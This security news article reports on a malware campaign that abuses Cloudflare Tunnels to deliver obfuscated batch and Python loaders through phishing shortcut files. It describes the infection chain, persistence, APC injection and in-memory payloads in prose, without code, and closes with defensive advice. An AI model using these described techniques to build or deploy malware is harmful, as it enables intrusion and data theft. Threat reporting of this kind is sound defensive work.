Cybercriminals Exploit Cloudflare Tunnels to Deploy Covert Python Malware

In a recent surge of cyberattacks, threat actors are abusing Cloudflare’s legitimate tunneling service to deliver stealthy malware, according to a detailed report from Securonix threat researchers.

The campaign, dubbed SERPENTINE#CLOUD, employs a multi-stage infection chain initiated by malicious shortcut files (.lnk) masquerading as harmless PDF documents.

Designed to evade detection by both users and security tools, this campaign targets victims in Western countries, especially the United States, the United Kingdom, and Germany, but has also been observed in other regions across Europe and Asia.

The attack begins with phishing emails featuring supposed invoices or payment confirmations. Recipients are prompted to open ZIP files containing .lnk files that appear as PDFs a social engineering ruse aided by custom icons and Windows operating quirks that hide file extensions even when enabled.

Once executed, the .lnk file leverages legitimate Windows utilities like cmd.exe and robocopy to download and execute the next stage payload from a remote WebDAV share hosted on a Cloudflare Tunnel subdomain, such as “flour-riding-merit-refers.trycloudflare[.]com.”

Cloudflare Tunnels provide a crucial layer of obfuscation and anonymity for attackers, allowing them to expose malicious payloads through temporary subdomains without the need to register domains or rent dedicated servers.

This trusted infrastructure makes it less likely for network monitoring tools to flag suspicious activity, as traffic blends in with legitimate Cloudflare CDN communications.

The use of HTTPS and WebDAV over SSL further complicates detection by encrypting payload delivery and evading deep packet inspection tools.

Multi-Stage Scripting and Obfuscation Techniques Shroud Malicious Intent

Following initial access, the attack progresses through several carefully orchestrated stages.

After the .lnk file fetches a malicious Windows Script File (WSF), a lightweight VBScript-based loader executes, retrieving and launching an obfuscated batch file from another Cloudflare subdomain.

The batch script employs complex encoding and variable substitution techniques to mask its true purpose, making static analysis challenging.

The main payload delivery script, often named something like “kiki.bat,” performs a range of evasive and persistence actions.

It deploys a decoy PDF to distract users, checks for antivirus software, and downloads compressed Python payloads into the victim’s Contacts or Print directories.

The script establishes persistence by placing VBS and additional batch files in the Windows startup folder, ensuring the malware re-executes after system reboots.

Python Shellcode Loaders and In-Memory Exploitation Mark Final Stage

The campaign’s most sophisticated phase utilizes Python-based shellcode loaders. These scripts obfuscated using advanced techniques such as alphanumeric shift encoding, bytewise shifting with randomized keys, and custom newline replacement, are designed to decrypt and execute RC4-encrypted shellcode entirely in memory.

One notable loader, “run.py,” implements Early Bird APC injection: it launches an innocent process (e.g., notepad.exe) in a suspended state, injects decrypted shellcode, and resumes execution, all while maintaining stealth and evading detection by endpoint protection systems.

Ultimately, the shellcode loads a Donut-packed PE (Portable Executable) payload, a framework for executing .NET assemblies entirely in memory without requiring disk access.

This approach not only complicates forensic analysis but also enables the threat actors to establish persistent command-and-control (C2) channels for credential theft, data exfiltration, and lateral movement.

Defensive Recommendations

Experts strongly advise organizations to bolster their defenses by enabling file extension visibility on Windows endpoints, monitoring for script activity in unusual directories (such as Contacts), and scrutinizing Python processes launched from atypical locations.

Robust endpoint logging and solutions like Sysmon can help detect multistage scripting attacks and anomalous process trees. Securonix has also released specific hunting queries to help organizations identify indicators of compromise related to this campaign.

This complex, layered attack exemplifies the evolving tactics of cybercriminals, blending social engineering with advanced obfuscation and abuse of legitimate infrastructure for maximum stealth and impact.

Analyzed files/hashes